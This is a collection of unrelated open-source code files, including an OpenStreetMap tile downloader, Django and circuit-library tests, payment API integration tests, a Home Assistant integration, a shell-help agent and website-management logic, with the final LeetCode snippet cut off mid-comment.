scripts/download_osm_tiles.py | MartinRusk/stratux | 104 | 12798131 | #!/usr/bin/python3
from sys import argv
import os
import math
import urllib.request
import random
import os.path
import sqlite3
URL_TEMPLATE = "https://c.tile.openstreetmap.org/%d/%d/%d.png"
BBOX = None # [lon_min, lat_min, lon_max, lat_max] or None for whole world
ZOOM_MAX = 7
LAYERTYPE = "baselayer" # "baselayer" or "overlay"
LAYERNAME = "OSM Low Detail"
TILE_FORMAT = "png"
def deg2num(lat_deg, lon_deg, zoom):
lat_rad = math.radians(lat_deg)
n = 2.0 ** zoom
xtile = int((lon_deg + 180.0) / 360.0 * n)
ytile = int((1.0 - math.log(math.tan(lat_rad) + (1 / math.cos(lat_rad))) / math.pi) / 2.0 * n)
return (xtile, ytile)
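# Example: deg2num(0.0, 0.0, 1) == (1, 1), i.e. the south-east tile of the
# 2x2 grid at zoom level 1 in the standard slippy-map (XYZ) scheme.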
def download_url(zoom, xtile, ytile, cursor):
subdomain = random.randint(1, 4)
url = URL_TEMPLATE % (zoom, xtile, ytile)
ymax = 1 << zoom
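    # MBTiles stores rows in the TMS scheme (y grows northward), so the
    # slippy-map (XYZ) row computed above has to be flipped.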
yinverted = ymax - ytile - 1
existing = cursor.execute('SELECT count(*) FROM tiles WHERE zoom_level=? AND tile_column=? AND tile_row=?', (zoom, xtile, yinverted)).fetchall()
if existing[0][0] > 0:
print('Skipping ' + url)
return
print("downloading %r" % url)
request = urllib.request.Request(
url, data=None,
headers={
'User-Agent': 'Low-Zoom Downloader'
}
)
source = urllib.request.urlopen(request)
content = source.read()
source.close()
cursor.execute('INSERT INTO tiles(zoom_level, tile_column, tile_row, tile_data) VALUES(?, ?, ?, ?)', (zoom, xtile, yinverted, content))
def main(argv):
db = argv[1] if len(argv) > 1 else 'osm.mbtiles'
conn = sqlite3.connect(db)
cur = conn.cursor()
bboxStr = "-180,-85,180,85" if BBOX is None else ",".join(map(str, BBOX))
cur.executescript('''
CREATE TABLE IF NOT EXISTS tiles (
zoom_level integer,
tile_column integer,
tile_row integer,
tile_data blob);
CREATE TABLE IF NOT EXISTS metadata(name text, value text);
CREATE UNIQUE INDEX IF NOT EXISTS metadata_name on metadata (name);
CREATE UNIQUE INDEX IF NOT EXISTS tile_index on tiles(zoom_level, tile_column, tile_row);
INSERT OR REPLACE INTO metadata VALUES('minzoom', '1');
INSERT OR REPLACE INTO metadata VALUES('maxzoom', '{0}');
INSERT OR REPLACE INTO metadata VALUES('name', '{1}');
INSERT OR REPLACE INTO metadata VALUES('type', '{2}');
INSERT OR REPLACE INTO metadata VALUES('format', '{3}');
INSERT OR REPLACE INTO metadata VALUES('bounds', '{4}');
'''.format(ZOOM_MAX, LAYERNAME, LAYERTYPE, TILE_FORMAT, bboxStr))
    # download all tiles from zoom 0 through ZOOM_MAX
for zoom in range(0, ZOOM_MAX+1):
xstart = 0
ystart = 0
xend = 2**zoom-1
yend = 2**zoom-1
if BBOX is not None:
xstart, yend = deg2num(BBOX[1], BBOX[0], zoom)
xend, ystart = deg2num(BBOX[3], BBOX[2], zoom)
for x in range(xstart, xend+1):
for y in range(ystart, yend+1):
download_url(zoom, x, y, cur)
conn.commit()
cur.close()
conn.close()
main(argv)
|
btb/selection/recent.py | dataronio/BTB | 161 | 12798133 | <filename>btb/selection/recent.py
import logging
from btb.selection.ucb1 import UCB1
# the minimum number of scores that each choice must have in order to use
# best-K optimizations. If not all choices meet this threshold, default UCB1
# selection will be used.
K_MIN = 2
logger = logging.getLogger('btb')
class RecentKReward(UCB1):
"""Recent K reward selector
Args:
k (int): number of best scores to consider
"""
def __init__(self, choices, k=K_MIN):
super(RecentKReward, self).__init__(choices)
self.k = k
def compute_rewards(self, scores):
"""Retain the K most recent scores, and replace the rest with zeros"""
for i in range(len(scores)):
if i >= self.k:
scores[i] = 0.
return scores
def select(self, choice_scores):
"""Use the top k learner's scores for usage in rewards for the bandit calculation"""
# if we don't have enough scores to do K-selection, fall back to UCB1
min_num_scores = min([len(s) for s in choice_scores.values()])
if min_num_scores >= K_MIN:
logger.info('{klass}: using Best K bandit selection'.format(klass=type(self).__name__))
reward_func = self.compute_rewards
else:
logger.warning(
'{klass}: Not enough choices to do K-selection; using plain UCB1'
.format(klass=type(self).__name__))
reward_func = super(RecentKReward, self).compute_rewards
choice_rewards = {}
for choice, scores in choice_scores.items():
if choice not in self.choices:
continue
choice_rewards[choice] = reward_func(scores)
return self.bandit(choice_rewards)
class RecentKVelocity(RecentKReward):
"""Recent K velocity selector"""
def compute_rewards(self, scores):
"""Compute the velocity of thte k+1 most recent scores.
The velocity is the average distance between scores. Return a list with those k velocities
padded out with zeros so that the count remains the same.
"""
# take the k + 1 most recent scores so we can get k velocities
recent_scores = scores[:-self.k - 2:-1]
velocities = [recent_scores[i] - recent_scores[i + 1] for i in
range(len(recent_scores) - 1)]
# pad the list out with zeros, so the length of the list is
# maintained
zeros = (len(scores) - self.k) * [0]
return velocities + zeros
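# Worked example: with k=2 and scores=[0.1, 0.2, 0.4, 0.7] (oldest first),
# recent_scores is [0.7, 0.4, 0.2], the velocities are approximately
# [0.3, 0.2], and the padded result is [0.3, 0.2, 0, 0].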
|
src/ralph/licences/tests/tests_models.py | DoNnMyTh/ralph | 1,668 | 12798145 | <filename>src/ralph/licences/tests/tests_models.py
# -*- coding: utf-8 -*-
from django.core.exceptions import ValidationError
from django.core.urlresolvers import reverse
from ralph.accounts.tests.factories import RegionFactory, UserFactory
from ralph.back_office.tests.factories import BackOfficeAssetFactory
from ralph.lib.transitions.tests import TransitionTestCase
from ralph.licences.models import BaseObjectLicence, Licence, LicenceUser
from ralph.licences.tests.factories import LicenceFactory
from ralph.tests import RalphTestCase
from ralph.tests.mixins import ClientMixin
class BaseObjectLicenceCleanTest(RalphTestCase):
def setUp(self):
super().setUp()
self.region_pl = RegionFactory(name='pl')
self.region_de = RegionFactory(name='de')
self.licence_de = LicenceFactory(region=self.region_de)
self.bo_asset = BackOfficeAssetFactory(region=self.region_pl)
def test_region_validate(self):
base_object_licence = BaseObjectLicence()
base_object_licence.licence = self.licence_de
base_object_licence.base_object = self.bo_asset
with self.assertRaisesRegex(
ValidationError,
(
'Asset region is in a different region than licence.'
)
):
base_object_licence.clean()
class LicenceTest(RalphTestCase):
def setUp(self):
super().setUp()
self.licence_1 = LicenceFactory(number_bought=3)
self.licence_2 = LicenceFactory(number_bought=1)
self.user_1 = UserFactory()
self.bo_asset = BackOfficeAssetFactory()
def test_get_autocomplete_queryset(self):
with self.assertNumQueries(2):
self.assertCountEqual(
Licence.get_autocomplete_queryset().values_list(
'pk', flat=True
),
[self.licence_1.pk, self.licence_2.pk]
)
def test_get_autocomplete_queryset_all_used(self):
BaseObjectLicence.objects.create(
base_object=self.bo_asset, licence=self.licence_1, quantity=1,
)
LicenceUser.objects.create(
user=self.user_1, licence=self.licence_1, quantity=2
)
with self.assertNumQueries(2):
self.assertCountEqual(
Licence.get_autocomplete_queryset().values_list(
'pk', flat=True
),
[self.licence_2.pk]
)
class LicenceFormTest(TransitionTestCase, ClientMixin):
def test_service_env_not_required(self):
self.assertTrue(self.login_as_user())
licence = LicenceFactory()
url = reverse(
'admin:licences_licence_change',
args=(licence.pk,)
)
resp = self.client.get(url, follow=True)
self.assertEqual(resp.status_code, 200)
form = resp.context['adminform'].form
self.assertIn('service_env', form.fields)
self.assertFalse(
form.fields['service_env'].required
)
def test_depreciation_rate_not_required(self):
self.assertTrue(self.login_as_user())
licence = LicenceFactory()
url = reverse(
'admin:licences_licence_change',
args=(licence.pk,)
)
resp = self.client.get(url, follow=True)
self.assertEqual(resp.status_code, 200)
form = resp.context['adminform'].form
self.assertIn('depreciation_rate', form.fields)
self.assertFalse(
form.fields['depreciation_rate'].required
)
|
homeassistant/components/laundrify/__init__.py | liangleslie/core | 30,023 | 12798181 | """The laundrify integration."""
from __future__ import annotations
from laundrify_aio import LaundrifyAPI
from laundrify_aio.exceptions import ApiConnectionException, UnauthorizedException
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_ACCESS_TOKEN, Platform
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryAuthFailed, ConfigEntryNotReady
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from .const import DEFAULT_POLL_INTERVAL, DOMAIN
from .coordinator import LaundrifyUpdateCoordinator
PLATFORMS = [Platform.BINARY_SENSOR]
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up laundrify from a config entry."""
session = async_get_clientsession(hass)
api_client = LaundrifyAPI(entry.data[CONF_ACCESS_TOKEN], session)
try:
await api_client.validate_token()
except UnauthorizedException as err:
raise ConfigEntryAuthFailed("Invalid authentication") from err
except ApiConnectionException as err:
raise ConfigEntryNotReady("Cannot reach laundrify API") from err
coordinator = LaundrifyUpdateCoordinator(hass, api_client, DEFAULT_POLL_INTERVAL)
await coordinator.async_config_entry_first_refresh()
hass.data.setdefault(DOMAIN, {})[entry.entry_id] = {
"api": api_client,
"coordinator": coordinator,
}
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
if unload_ok := await hass.config_entries.async_unload_platforms(entry, PLATFORMS):
hass.data[DOMAIN].pop(entry.entry_id)
return unload_ok
|
clai/server/plugins/helpme/helpme.py | cohmoti/clai | 391 | 12798217 | #
# Copyright (C) 2020 IBM. All Rights Reserved.
#
# See LICENSE.txt file in the root directory
# of this source tree for licensing information.
#
import os
from collections import OrderedDict
from pathlib import Path
from typing import List
from clai.tools.colorize_console import Colorize
from clai.server.searchlib.data import Datastore
from clai.server.agent import Agent
from clai.server.command_message import State, Action, NOOP_COMMAND
from clai.server.logger import current_logger as logger
class HelpMeAgent(Agent):
def __init__(self):
super(HelpMeAgent, self).__init__()
inifile_path = os.path.join(str(Path(__file__).parent.absolute()), 'config.ini')
self.store = Datastore(inifile_path)
def compute_simple_token_similarity(self, src_sequence, tgt_sequence):
src_tokens = set([x.lower().strip() for x in src_sequence.split()])
tgt_tokens = set([x.lower().strip() for x in tgt_sequence.split()])
return len(src_tokens & tgt_tokens) / len(src_tokens)
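    # Example: for src_sequence="file not found" and tgt_sequence="No such file
    # or directory", the shared lowercased token set is {"file"}, so the
    # similarity is 1/3.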
def compute_confidence(self, query, forum, manpage):
"""
Computes the confidence based on query, stack-exchange post answer and manpage
Algorithm:
1. Compute token-wise similarity b/w query and forum text
2. Compute token-wise similarity b/w forum text and manpage description
3. Return product of two similarities
Args:
query (str): standard error captured in state variable
forum (str): answer text from most relevant stack exchange post w.r.t query
manpage (str): manpage description for most relevant manpage w.r.t. forum
Returns:
confidence (float): confidence on the returned manpage w.r.t. query
"""
query_forum_similarity = self.compute_simple_token_similarity(query, forum[0]['Content'])
forum_manpage_similarity = self.compute_simple_token_similarity(forum[0]['Answer'], manpage)
confidence = query_forum_similarity * forum_manpage_similarity
return confidence
def get_next_action(self, state: State) -> Action:
return Action(suggested_command=state.command)
def post_execute(self, state: State) -> Action:
logger.info("==================== In Helpme Bot:post_execute ============================")
logger.info("State:\n\tCommand: {}\n\tError Code: {}\n\tStderr: {}".format(state.command,
state.result_code,
state.stderr))
logger.info("============================================================================")
if state.result_code == '0':
return Action(suggested_command=state.command)
        apis: OrderedDict = self.store.get_apis()
helpWasFound = False
for provider in apis:
            # We don't want to process the manpages provider... that's the provider
# that we use to clarify results from other providers
if provider == "manpages":
logger.info(f"Skipping search provider 'manpages'")
continue
            thisAPI: Provider = apis[provider]
# Skip this provider if it isn't supported on the target OS
if not thisAPI.can_run_on_this_os():
logger.info(f"Skipping search provider '{provider}'")
logger.info(f"==> Excluded on platforms: {str(thisAPI.get_excludes())}")
continue # Move to next provider in list
logger.info(f"Processing search provider '{provider}'")
if thisAPI.has_variants():
logger.info(f"==> Has search variants: {str(thisAPI.get_variants())}")
                variants: List = thisAPI.get_variants()
else:
logger.info(f"==> Has no search variants")
                variants: List = [None]
# For each search variant supported by the current API, query
# the data store to find the closest matching data. If there are
# no search variants (ie: the singleton variant case), the variants
# list will only contain a single, Nonetype value.
for variant in variants:
if variant is not None:
logger.info(f"==> Searching variant '{variant}'")
data = self.store.search(state.stderr, service=provider, size=1, searchType=variant)
else:
data = self.store.search(state.stderr, service=provider, size=1)
if data:
apiString = str(thisAPI)
if variant is not None:
apiString = f"{apiString} '{variant}' variant"
logger.info(f"==> Success!!! Found a result in the {apiString}")
# Find closest match b/w relevant data and manpages for unix
searchResult = thisAPI.extract_search_result(data)
manpages = self.store.search(searchResult, service='manpages', size=5)
if manpages:
logger.info("==> Success!!! found relevant manpages.")
command = manpages['commands'][-1]
confidence = manpages['dists'][-1]
# FIXME: Artificially boosted confidence
confidence = 1.0
logger.info("==> Command: {} \t Confidence:{}".format(command, confidence))
# Set return data
suggested_command="man {}".format(command)
description=Colorize() \
.emoji(Colorize.EMOJI_ROBOT).append(f"I did little bit of Internet searching for you, ") \
.append(f"and found this in the {thisAPI}:\n") \
.info() \
.append(thisAPI.get_printable_output(data)) \
.warning() \
.append("Do you want to try: man {}".format(command)) \
.to_console()
# Mark that help was indeed found
helpWasFound = True
# We've found help; no need to keep searching
break
# If we found help, then break out of the outer loop as well
if helpWasFound:
break
if not helpWasFound:
logger.info("Failure: Unable to be helpful")
logger.info("============================================================================")
suggested_command=NOOP_COMMAND
description=Colorize().emoji(Colorize.EMOJI_ROBOT) \
.append(
f"Sorry. It looks like you have stumbled across a problem that even the Internet doesn't have answer to.\n") \
.info() \
.append(f"Have you tried turning it OFF and ON again. ;)") \
.to_console()
confidence=0.0
return Action(suggested_command=suggested_command,
description=description,
confidence=confidence)
|
tests/test_circuit/test_undriven_unused.py | leonardt/magma | 167 | 12798233 | """
Test the ability to ignore undriven inputs (useful for formal verification
tools that use undriven inputs to mark wires that can take on any value)
"""
import pytest
import magma as m
from magma.testing import check_files_equal
def test_ignore_unused_undriven_basic():
class Main(m.Circuit):
_ignore_undriven_ = True
io = m.IO(I=m.In(m.Bit), O=m.Out(m.Bit))
temp = ~io.I
m.compile("build/test_ignore_unused_undriven_basic", Main, inline=True,
drive_undriven=True, terminate_unused=True)
assert check_files_equal(__file__,
"build/test_ignore_unused_undriven_basic.v",
"gold/test_ignore_unused_undriven_basic.v")
def test_ignore_unused_undriven_hierarchy():
# For backwards compatability test
with pytest.warns(DeprecationWarning):
Bar = m.DeclareCircuit("Bar", "I", m.In(m.Bit))
class Foo(m.Circuit):
io = m.IO(I0=m.In(m.Bit), I1=m.In(m.Bit),
O0=m.Out(m.Bit), O1=m.Out(m.Bit))
io.O1 @= io.I0
Bar()(io.I1)
class Main(m.Circuit):
_ignore_undriven_ = True
io = m.IO(I0=m.In(m.Bit), I1=m.In(m.Bit),
O0=m.Out(m.Bit), O1=m.Out(m.Bit),
O2=m.Out(m.Tuple[m.Bit, m.Bit]),
O3=m.Out(m.Array[2, m.Bit]))
foo = Foo()
foo.I0 @= io.I0
io.O0 @= foo.O0
# partially undriven
io.O2[0] @= 1
io.O3[0] @= 1
m.compile("build/test_ignore_unused_undriven_hierarchy", Main, inline=True,
drive_undriven=True, terminate_unused=True)
assert check_files_equal(__file__,
"build/test_ignore_unused_undriven_hierarchy.v",
"gold/test_ignore_unused_undriven_hierarchy.v")
def test_ignore_undriven_coreir():
class Foo(m.Circuit):
_ignore_undriven_ = True
io = m.IO(I0=m.In(m.Bit), O0=m.Out(m.Bit), O1=m.Out(m.Bit))
io += m.ClockIO()
io.O1 @= io.I0
class Main(m.Circuit):
_ignore_undriven_ = True
io = m.IO(I0=m.In(m.Bits[2]), I1=m.In(m.Bits[2]), O0=m.Out(m.Bit),
O1=m.Out(m.Bit)) + m.ClockIO()
foo = Foo()
foo.I0 @= io.I0 == io.I1
io.O0 @= foo.O0
m.compile("build/test_ignore_undriven_coreir", Main, output="coreir",
drive_undriven=True, terminate_unused=True)
assert check_files_equal(__file__,
"build/test_ignore_undriven_coreir.json",
"gold/test_ignore_undriven_coreir.json")
|
payment/tests/integ/test_api.py | Al-bambino/aws-serverless-ecommerce-platform | 758 | 12798249 | <filename>payment/tests/integ/test_api.py
import uuid
import pytest
import requests
from fixtures import iam_auth # pylint: disable=import-error
from helpers import get_parameter # pylint: disable=import-error,no-name-in-module
@pytest.fixture(scope="module")
def payment_3p_api_url():
return get_parameter("/ecommerce/{Environment}/payment-3p/api/url")
@pytest.fixture(scope="module")
def payment_api_url():
return get_parameter("/ecommerce/{Environment}/payment/api/url")
def test_backend_validate(payment_3p_api_url, payment_api_url, iam_auth):
"""
Test /backend/validate
"""
card_number = "1234567890123456"
total = 3000
# Create a payment token
res_3p = requests.post(payment_3p_api_url+"/preauth", json={
"cardNumber": card_number,
"amount": total
})
payment_token = res_3p.json()["paymentToken"]
# Validate the token
res = requests.post(
payment_api_url+"/backend/validate",
auth=iam_auth(payment_api_url),
json={
"paymentToken": payment_token,
"total": total
}
)
assert res.status_code == 200
body = res.json()
assert "ok" in body
assert "message" not in body
assert body["ok"] == True
# Cleanup
requests.post(payment_3p_api_url+"/cancelPayment", json={
"paymentToken": payment_token
})
def test_backend_validate_non_existent(payment_3p_api_url, payment_api_url, iam_auth):
"""
Test /backend/validate with a non-existent token
"""
    payment_token = str(uuid.uuid4())
total = 3000
# Validate the token
res = requests.post(
payment_api_url+"/backend/validate",
auth=iam_auth(payment_api_url),
json={
"paymentToken": payment_token,
"total": total
}
)
assert res.status_code == 200
body = res.json()
assert "ok" in body
assert "message" not in body
assert body["ok"] == False
def test_backend_validate_smaller_total(payment_3p_api_url, payment_api_url, iam_auth):
"""
Test /backend/validate with a smaller total
"""
card_number = "1234567890123456"
total = 3000
# Create a payment token
res_3p = requests.post(payment_3p_api_url+"/preauth", json={
"cardNumber": card_number,
"amount": total
})
payment_token = res_3p.json()["paymentToken"]
# Validate the token
res = requests.post(
payment_api_url+"/backend/validate",
auth=iam_auth(payment_api_url),
json={
"paymentToken": payment_token,
"total": total-1000
}
)
assert res.status_code == 200
body = res.json()
assert "ok" in body
assert "message" not in body
assert body["ok"] == True
# Cleanup
requests.post(payment_3p_api_url+"/cancelPayment", json={
"paymentToken": payment_token
})
def test_backend_validate_higher_total(payment_3p_api_url, payment_api_url, iam_auth):
"""
Test /backend/validate with a higher total
"""
card_number = "1234567890123456"
total = 3000
# Create a payment token
res_3p = requests.post(payment_3p_api_url+"/preauth", json={
"cardNumber": card_number,
"amount": total
})
payment_token = res_3p.json()["paymentToken"]
# Validate the token
res = requests.post(
payment_api_url+"/backend/validate",
auth=iam_auth(payment_api_url),
json={
"paymentToken": payment_token,
"total": total+2000
}
)
assert res.status_code == 200
body = res.json()
assert "ok" in body
assert "message" not in body
assert body["ok"] == False
# Cleanup
requests.post(payment_3p_api_url+"/cancelPayment", json={
"paymentToken": payment_token
})
def test_backend_validate_no_iam(payment_3p_api_url, payment_api_url):
"""
Test /backend/validate without IAM authorization
"""
card_number = "1234567890123456"
total = 3000
# Create a payment token
res_3p = requests.post(payment_3p_api_url+"/preauth", json={
"cardNumber": card_number,
"amount": total
})
payment_token = res_3p.json()["paymentToken"]
# Validate the token
res = requests.post(
payment_api_url+"/backend/validate",
json={
"paymentToken": payment_token,
"total": total
}
)
assert res.status_code == 403
body = res.json()
assert "ok" not in body
assert "message" in body
# Cleanup
requests.post(payment_3p_api_url+"/cancelPayment", json={
"paymentToken": payment_token
})
def test_backend_validate_no_total(payment_3p_api_url, payment_api_url, iam_auth):
"""
    Test /backend/validate without a total
"""
card_number = "1234567890123456"
total = 3000
# Create a payment token
res_3p = requests.post(payment_3p_api_url+"/preauth", json={
"cardNumber": card_number,
"amount": total
})
payment_token = res_3p.json()["paymentToken"]
# Validate the token
res = requests.post(
payment_api_url+"/backend/validate",
auth=iam_auth(payment_api_url),
json={
"paymentToken": payment_token
}
)
assert res.status_code == 400
body = res.json()
assert "ok" not in body
assert "message" in body
assert "total" in body["message"]
# Cleanup
requests.post(payment_3p_api_url+"/cancelPayment", json={
"paymentToken": payment_token
})
def test_backend_validate_no_payment_token(payment_3p_api_url, payment_api_url, iam_auth):
"""
Test /backend/validate without a payment token
"""
card_number = "1234567890123456"
total = 3000
# Create a payment token
res_3p = requests.post(payment_3p_api_url+"/preauth", json={
"cardNumber": card_number,
"amount": total
})
payment_token = res_3p.json()["paymentToken"]
# Validate the token
res = requests.post(
payment_api_url+"/backend/validate",
auth=iam_auth(payment_api_url),
json={
"total": total
}
)
assert res.status_code == 400
body = res.json()
assert "ok" not in body
assert "message" in body
assert "paymentToken" in body["message"]
# Cleanup cancelPayment
requests.post(payment_3p_api_url+"/cancelPayment", json={
"paymentToken": payment_token
}) |
thanks/package_tools.py | vsprogrammer2909/thanks | 168 | 12798259
from functools import reduce
from itertools import chain, takewhile
import os
import pkg_resources
import re
class MetaDataNotFound(Exception):
pass
def get_local_dist(package_name):
working_set = dict(
(dist.project_name, dist) for dist in pkg_resources.WorkingSet()
)
return working_set[package_name]
def get_dist_metadata(dist):
metadata_path = get_local_dist_metadata_filepath(dist)
with open(metadata_path) as fh:
metadata = parse_metadata(fh.read())
return metadata
def get_funding_data(metadata):
return metadata.get('funding_url')
def get_local_dist_metadata_filepath(dist):
# Dist filename syntax
# name ["-" version ["-py" pyver ["-" required_platform]]] "." ext
# https://setuptools.readthedocs.io/en/latest/formats.html#filename-embedded-metadata
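    # For example (hypothetical values): a dist named "sample-pkg" at version
    # 1.2.0 with py_version "3.8" and no platform yields roughly
    # "sample_pkg-1.2.0-py3.8" here, before the ".egg-info"/".dist-info"
    # extension is appended further down.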
def valid_component(component):
return component[1]
# Stop taking filename components at the first missing/invalid component
filename_component = takewhile(valid_component, (
('', pkg_resources.to_filename(pkg_resources.safe_name(dist.project_name))),
('-', pkg_resources.to_filename(pkg_resources.safe_version(dist.version))),
('-py', dist.py_version),
('-', dist.platform),
))
filename = ''.join(chain(*filename_component))
if isinstance(dist, pkg_resources.EggInfoDistribution):
ext = 'egg-info'
metadata_file = 'PKG-INFO'
elif isinstance(dist, pkg_resources.DistInfoDistribution):
ext = 'dist-info'
metadata_file = 'METADATA'
elif isinstance(dist, pkg_resources.Distribution):
ext = os.path.join('egg', 'EGG-INFO')
metadata_file = 'PKG-INFO'
else:
ext = None
metadata_file = None
    if not ext:
        # Unknown distribution type: there is no metadata file to locate.
        return None
    filename = '{}.{}'.format(filename, ext)
    return os.path.join(dist.location, filename, metadata_file)
metadata_patterns = re.compile(r"""
(\s*Author:\s+(?P<author>.*)\s*)? # Author
(\s*Maintainer:\s+(?P<maintainer>.+)\s*)? # Maintainer
(\s*Project-URL:\sFunding,\s+(?P<funding_url>.+)\s*)? # Funding URL
""", re.VERBOSE)
def get_line_metadata(line):
return metadata_patterns.search(line).groupdict()
def filter_empty_metadata(metadata):
return dict((k, v) for k, v in metadata.items() if v)
def parse_metadata(metadata):
metadata = (
filter_empty_metadata(get_line_metadata(line))
for line in metadata.splitlines()
)
metadata = [m for m in metadata if m]
metadata = reduce(
lambda x, y: dict((k, v) for k, v in chain(x.items(), y.items())),
metadata,
{},
)
return metadata
def get_local_metadata(package_name):
try:
dist = get_local_dist(package_name)
metadata = get_dist_metadata(dist)
except FileNotFoundError:
# No metadata.json file locally
raise MetaDataNotFound()
return metadata
def get_local_funding_metadata(package_name):
try:
metadata = get_local_metadata(package_name)
funding_url = get_funding_data(metadata)
except KeyError:
# Package not available locally,
# or there isn't a 'Funding' entry in the project_urls
raise MetaDataNotFound()
return funding_url
|
backend/lk/logic/websites.py | Purus/LaunchKitDocker | 2,341 | 12798281
# encoding: utf-8
#
# Copyright 2016 Cluster Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from datetime import datetime
from django.conf import settings
from django.db import transaction
from backend.lk.logic import appstore_fetch
from backend.lk.models import AppWebsiteScreenshot
from backend.lk.models import AppWebsitePage
from backend.util import dnsutil
from backend.util import text
def check_domain_for_cname_record(domain):
cname, error_message = dnsutil.get_cname_for_domain(domain)
if error_message:
return False, error_message
if cname != '%s.' % settings.HOSTED_WEBSITE_CNAME:
return False, 'The CNAME value is set but incorrect'
return True, None
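# Illustrative (made-up setting value): if HOSTED_WEBSITE_CNAME were
# "sites.launchkit.example", a customer domain passes only when its CNAME
# resolves to exactly "sites.launchkit.example." -- the absolute DNS form,
# hence the trailing dot in the comparison above.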
def _short_description(long_description):
if not long_description:
return long_description
return '%s...' % long_description[:180]
def example_from_itunes_id(itunes_id, country):
info = appstore_fetch.app_info_with_id(itunes_id, country)
app_name, app_tagline = text.app_name_tagline(info.name)
example_website = {
'id': 'example',
'appName': app_name,
'tagline': app_tagline,
'longDescription': info.description,
'shortDescription': _short_description(info.description),
'itunesId': info.itunes_id,
'images': {
'screenshots': {'iPhone': [{'url': screenshot} for screenshot in info.screenshots]},
'icon': {'url': info.icon_512},
}
}
return example_website
def get_fancy_cluster_example():
return {
'id': 'example',
'domain': 'cluster.co',
'template': '',
'appName': 'Cluster',
'tagline': 'Privately share special moments with friends and family',
'shortDescription': 'Cluster gives you a private space to share photos and memories with the people you choose, away from social media. Make your own groups and share pics, videos, comments, and chat!',
'longDescription': u'Cluster makes it possible to create private groups where you share moments through photos and videos with the people you care about. Create a group with family, a group of friends, coworkers, people from your home town, or anyone else!\r\n\r\nGreat for:\r\n\u2022 New Moms! Share photos of a new baby with close friends and family without spamming everyone on other social networks\r\n\u2022 College Students! Share memories with friends not appropriate for Facebook\r\n\u2022 Families! Keep in touch even if you\u2019re not in the same place.\r\n\r\nTons of people already trust Cluster. Here\u2019s why:\r\n\r\n\u2022 Private & secure: Only invited members of the group can see what you post.\r\n\u2022 An app for everyone: Access Cluster through gorgeous mobile apps and the web.\r\n\u2022 Relevant notifications: Know when people you invited post new things to the group.',
'keywords': 'private,group,social,network,space,family,album,photo,video,collaborative,shared,sharing,event,baby',
'itunesId': '596595032',
'playStoreId': 'com.getcluster.android',
'supportLink': 'http://cluster.co/help',
'termsLink': 'http://cluster.co/terms',
'privacyLink': 'http://cluster.co/privacy',
'primaryColor': '#0092F2',
'font': 'Lato',
'frameScreenshots': 'white',
'images': {
'logo': {'url':'https://cluster-static.s3.amazonaws.com/images/marketing/presskit/cluster-logo-white-v1f813d97.png'},
'background': {'url':'https://cluster-static.s3.amazonaws.com/images/namespaces/default/homepage-billboard-v4bead2de.jpg'},
'icon': {'url':'http://a1668.phobos.apple.com/us/r30/Purple3/v4/01/c6/f0/01c6f095-df15-7bd9-03f6-53dba727cc8b/mzl.clrnjwyb.png'},
'screenshots':
{'iPhone': [{'url':'http://a3.mzstatic.com/us/r30/Purple3/v4/46/6a/f0/466af0fb-f1d7-80b5-6d03-ccd36ad904ef/screen1136x1136.jpeg'},
{'url':'http://a2.mzstatic.com/us/r30/Purple3/v4/4d/41/8c/4d418cfe-a384-312b-f04f-ac336c3359ff/screen1136x1136.jpeg'},
{'url':'http://a5.mzstatic.com/us/r30/Purple5/v4/21/a6/5a/21a65abd-2f66-6265-1fb0-c08c72e403b3/screen1136x1136.jpeg'},
{'url':'http://a3.mzstatic.com/us/r30/Purple3/v4/a6/6d/4e/a66d4e25-d0f7-d1d0-05ab-edffa3899c14/screen1136x1136.jpeg'},
{'url':'http://a4.mzstatic.com/us/r30/Purple1/v4/33/a0/d0/33a0d056-1761-9c51-4bb7-35813eb14f1f/screen1136x1136.jpeg'},
],
}
},
}
@transaction.atomic
def update_website_screenshots(website, screenshot_images, platform):
existing_screenshots = list(AppWebsiteScreenshot.objects.filter(website_id=website.id, platform=platform).order_by('order'))
screenshot_image_ids = set([i.id for i in screenshot_images])
screenshots_to_delete = [s for s in existing_screenshots
if s.image_id not in screenshot_image_ids]
for screenshot in screenshots_to_delete:
screenshot.image.decrement_ref_count()
screenshot.delete()
existing_by_image_id = {i.image_id: i for i in existing_screenshots}
for i, image in enumerate(screenshot_images):
order = i + 1
if image.id in existing_by_image_id:
screenshot = existing_by_image_id[image.id]
if screenshot.order != order:
screenshot.order = order
screenshot.save()
else:
image.increment_ref_count()
screenshot = AppWebsiteScreenshot(website=website, image=image, platform=platform, order=order)
screenshot.save()
@transaction.atomic
def create_or_update_hosted_page(website, slug, body):
hosted_page_titles = {
'terms' : 'Terms and Conditions',
'privacy' : 'Privacy Policy',
'support' : 'Support',
}
page = AppWebsitePage.objects.filter(website=website, slug=slug).first()
if page and body:
page.body = body
page.save()
elif not page and body:
AppWebsitePage.objects.create(website=website, slug=slug, body=body, title=hosted_page_titles[slug])
elif page and not body:
page.delete()
@transaction.atomic
def delete_website(website):
screenshots = list(website.screenshots.all())
for screenshot in screenshots:
screenshot.image.decrement_ref_count()
screenshot.delete()
if website.icon:
website.icon.decrement_ref_count()
website.icon = None
if website.logo:
website.logo.decrement_ref_count()
website.logo = None
if website.background:
website.background.decrement_ref_count()
website.background = None
# TODO(Taylor): Mark as deleted instead of actually deleting potentially huge number of rows
# AppWebsiteView.objects.filter(website_id=website.id).delete()
website.domain = None
website.delete_time = datetime.now()
website.save()
|
Python3/1287.py | rakhi2001/ecom7 | 854 | 12798313
__________________________________________________________________________________________________
sample 76 ms submission
class Solution:
def findSpecialInteger(self, arr: List[int]) -> int:
for idx, num in enumerate(arr):
if arr[idx] == arr[idx+len(arr)//4]: return num
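# Annotation (not part of the submission): the array is sorted, so a value
# occurring in more than 25% of the n positions must fill some window of
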